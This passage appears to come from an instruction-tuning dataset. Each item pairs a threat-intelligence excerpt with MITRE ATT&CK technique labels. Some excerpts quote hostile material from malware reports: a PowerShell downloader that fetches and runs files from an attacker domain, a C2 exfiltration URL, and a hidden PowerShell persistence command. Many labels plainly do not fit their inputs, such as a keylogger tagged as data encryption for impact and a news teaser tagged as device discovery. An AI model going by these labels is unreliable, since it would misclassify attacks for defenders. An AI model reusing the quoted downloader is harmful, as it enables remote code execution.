structured as follows: spp=[system information from WMI queries] &spvg=[screenshot in JPEG format] Conclusion The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques", + "output": "- T1047: Windows Management Instrumentation\n- T1057: Process Discovery\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Trojan checks the modified time of the file by creating an HTTP request to a URL structured as follows: + + \u201c?supportTeamDrives=true&fields=modifiedTime\u201d The Trojan then uses the following regular expression to obtain the modified time of the file from the HTTP response, which is saved to the variable named modification_time: \\\u201dmodifiedTime\\\u201d:(.*) The Trojan then uploads a second file to the Google Drive, the purpose of which is to allow the Trojan to continually write to this file as it waits for the actor to modify the first file uploaded", + "output": "- T1074: Data Staged\n- T1070.006: Indicator Removal - Timestomp\n- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Trojan compares the TimeZone.CurrentTimeZone.DaylightName property to strings Iran, Arab, Arabia and Middle East, which will match the following time zones in Windows: \u00a0 Arabic Daylight Time (UTC+3) Arab Daylight Time (UTC+3) Arabian Daylight Time (UTC+4) Middle East Daylight Time (UTC+2) Iran Daylight Time (UTC+3.5) According to MSDN, these five time zones encompass 10 countries that fall within UTC+2, +3, +3.5 or +4 as seen in Figure 3", + "output": "- T1070.006: Indicator Removal - Timestomp\n- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Trojan downloads the contents of this file by crafting an HTTP request to a URL structured as follows: + + \u201c?alt=media\u201d With the contents of the file downloaded, the Trojan sets the modification_time variable to the current modification time so the Trojan knows when the actor makes further changes to the file", + "output": "- T1070.006: Indicator Removal - Timestomp\n- T1105: Ingress Tool Transfer\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the \u201copen\u201d function using the ShellExecuteW API function", + "output": "- T1106: Native API\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The URL used can be found in the embedded OLE object:hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]Here is the source code of the downloaded HTA document:BonjourOnce decoded using the base64 algorithm, we are able to read the final payload:$c=new-object System.Net.WebClient$t =$env:temp$t1=$t+\"\"\\\\alitmp0131.jpg\"\"$t2=$t+\"\"\\\\alitmp0132.jpg\"\"$t3=$t+\"\"\\\\alitmp0133.js\"\"try { echo $c.DownloadFile( \"\"hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg\"\",$t1) $c.DownloadFile( \"\"hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg\"\",$t2) $c.DownloadFile( \"\"hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp\"\",$t3) wscript.exe $t3 }catch { }The purpose of this script is to download and execute a Windows script and two encoded payloads\"", + "output": "- T1071: Application Layer Protocol\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\ v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory", + "output": "- T1074: Data Staged\n- T1064: Scripting\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The VB.NET variant then gathers system information and running processes like other Zebrocy variants by running the following commands: systeminfo & tasklist The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp://109.248.148[.]42/agr-enum/progress-inform/cube.php?res=[serial number] The VB.NET variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows (notice the spaces before and after ampersand \u201c&\u201d): data=[system information and running processes] & arg=[screenshot in BMP format] C# Zebrocy Variant The C# variant of Zebrocy is similar to other variants in functionality, but also has several unique attributes that are worth discussing", + "output": "- T1132: Data Encoding\n- T1082: System Information Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate domain names in appearance", + "output": "- T1036: Masquerading\n- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The x command treats the supplied data as a PowerShell script that it will write to the current PowerShell script (Office365DCOMCheck.ps1/SystemDiskClean.ps1), effectively overwriting the initial PowerShell script with a secondary payload script", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BE2 also uses start menu locations for persistence: UsersuserAppDataRoamingMicrosoftWindowsStart", + "output": "- T1007: System Service Discovery\n- T1074: Data Staged\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The \u201cExcel\u201d command receives another stage of the PowerShell code, saves it in \u201cc:\\programdata\\a.ps1\u201d and then asks Excel to execute this PowerShell script via DDE", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This account was suspended in short order, but immediately after the suspension, an alternate account with the username @dookhtegan1 with the same stylized profile image appeared and is still currently active", + "output": "- T1087: Account Discovery\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This decrypted data is written to the following location: %TEMP%\\WUpdate.~tmp This \u2018WUpdate.~tmp\u2019 file is then copied to a filename of \u2018Applet.cpl\u2019, which is placed in the previously identified file path", + "output": "- T1074: Data Staged\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This DLL file creates a scheduled task named BaiduUpdateTask1, which attempts to run the malicious, spoofed MSBuild.exe every subsequent minute", + "output": "- T1036: Masquerading\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This has led it to do more, such as: Communication with more C&C servers \u2013 up to 16 P2P communication between infected nodes MAC address check - PlugX runs if the MAC address of an infected host\u00a0coincides with configuration information in itself (If not specified in the configuration, PlugX runs on any host)", + "output": "- T1016: System Network Configuration Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it", + "output": "- T1087: Account Discovery\n- T1598.002: Phishing for Information - Spearphishing Attachment\n- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is a classic RAT that can download, upload, execute commands on the victim host and, finally, perform keylogging", + "output": "- T1056: Input Capture\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is performed by checking if the following libraries are loaded on the victim machine.SbieDll.dll (sandboxie library)Dbghelp.dll (Microsoft debugging tools)Api_log.dll (threatAnalyzer / GFI SandBox)Dir_watch.dll (threatAnalyzer / GFI SandBox)We were able to uncover some other techniques used by this variant of ROKRAT to make analysis difficult, Group 123 used an anti-debugging technique related to NOP (No Operation).nop dword ptr [eax+eax+00h] is a 5 byte NOP", + "output": "- T1574.002: Hijack Execution Flow - DLL Side-Loading\n- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This log contains the external IP, the geographic location, the machine name, the time the machine was infected, as well as fields to be logged in the threat actor\u2019s database", + "output": "- T1070: Indicator Removal\n- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This plugin provides the attacker with the ability to both list files and download/upload files on the victim machine", + "output": "- T1105: Ingress Tool Transfer\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This shortcut file points to \u2018C:\\Windows\\system32\\rundll32.exe \u201c%APPDATA%\\cnagnt.dll\u201d,Sd\u2019 One of the exceptions to the installation routine above is in the event Symantec is detected", + "output": "- T1218.011: System Binary Proxy Execution - Rundll32\n- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Thread Name Description Key logger Logs key strokes for configured processes and sends them to the command and control (C2) server Form grabber Monitors HTTP traffic for form data and sends it to the C2 server POS monitor Monitors for changes to logs stored in C:\\NSB\\Coalition\\Logs and nsb.pos.client.log and sends parsed data to the C2 server PST monitor Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server HTTP proxy monitor Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use", + "output": "- T1486: Data Encrypted for Impact\n- T1090: Proxy\n- T1071: Application Layer Protocol\n- T1132: Data Encoding\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat actor using appcmd to delete logs and disable logging", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To create the scheduled task, the PowerShell payload starts by writing the following to a VBScript file with the same name as the task name \u00a0(ex", + "output": "- T1036: Masquerading\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To install the payload, the script will create a file %APPDATA%\\OneDrive.bat and save the following string to it: powershell.exe -WindowStyle Hidden -exec bypass\u00a0 -File \u201c%APPDATA%\\OneDrive.ps1\u201d The script then writes a modified copy of itself to %APPDATA%\\OneDrive.ps1, with the code that performs this installation omitted", + "output": "- T1064: Scripting\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To set up persistence, the loader creates a folder named \u201cc:\\temp\u201d, sets its attributes to be a hidden and system folder to hide the folder from view in Windows Explorer", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tweets by second account @dookhtegan1 providing a Telegram channel with the leaked files Data Dump Contents The contents of the data dump includes various types of datasets that appear to be results from reconnaissance activity, initial compromises, and tools the OilRig operators use against target organizations", + "output": "- T1003: OS Credential Dumping\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unpacking routine for SWF exploit The exploit is a memory corruption vulnerability that exists in the \u201ccom.adobe.tvsdk.mediacore.BufferControlParameters\u201d class.\u00a0 If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode", + "output": "- T1203: Exploitation for Client Execution\n- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Upon execution, the \u201cWindows Folder.exe\u201d file copies itself to C:\\Users\\\\AppData\\Roaming and creates a Windows shortcut (LNK) file in the victim\u2019s Startup directory as a persistence mechanism", + "output": "- T1074: Data Staged\n- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Upon execution, this command extracted, decrypted, and executed the PowerShell backdoor payload stored in the HiveUploadTask text property of the RacTask class", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious attachments", + "output": "- T1598.003: Phishing for Information - Spearphishing Link\n- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Watch on\u00a0Fox News: Hackers may use fake Netflix app to spy on\u00a0users As users have become more attached to their mobile devices, they want everything on those devices", + "output": "- T1087: Account Discovery\n- T1120: Peripheral Device Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We are still analyzing this Trojan to determine the specific structure of the data sent between the Trojan and the C2 server; however, it does appear that the Trojan is using the RC4 algorithm to encrypt data sent to the C2 server within HTTP POST requests", + "output": "- T1573: Encrypted Channel\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We are unsure of the shellcode hosted at this URL, but it is possible that additional shellcode-based payloads like Meterpreter could have been served by this shellcode", + "output": "- T1064: Scripting\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell: Append a string to the password that acts as a salt Obtain the SHA1 hash of the resulting string containing the password and salt Base64 encode the SHA1 hash Compare the encoded hash with hardcoded base64 string If the encoded hash matches hardcoded base64 string then the inbound request is authenticated Generates the SHA256 hash of the password string Base64 encodes the SHA256 hash and uses the first 24 characters as a key Uses 24-character key and the 3DES cipher to decrypt the embedded webshell Now let\u2019s look at how this works with the values in the TwoFace++ loader sample", + "output": "- T1573: Encrypted Channel\n- T1027: Obfuscated Files or Information\n- T1550.002: Use Alternate Authentication Material - Pass the Hash\n- T1132: Data Encoding\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We have gathered three samples of the default loader associated with this group and extracted the following configurations: SHA256 of Sample Configuration 82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190 LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019] db453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019] 7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73 LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018139.59.46[.]154:3543\u2019, \u2018-t\u2019, \u2018obfs3\u2019] \u00a0 These configurations show that this group uses both fully-qualified domain names and IP addresses to host their Pupy C2 servers", + "output": "- T1016: System Network Configuration Discovery\n- T1008: Fallback Channels\n- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We have observed the following capabilities of this payload: Get drive information Read files Write files Delete files Move files Spawn processes Create directories Reaver TCP Payload The malicious CPL payload of Reaver has the following three exported functions: ServiceMain CPlApplet DllEntryPoint When the malware is initially loaded, DllEntryPoint will be called, which in turn 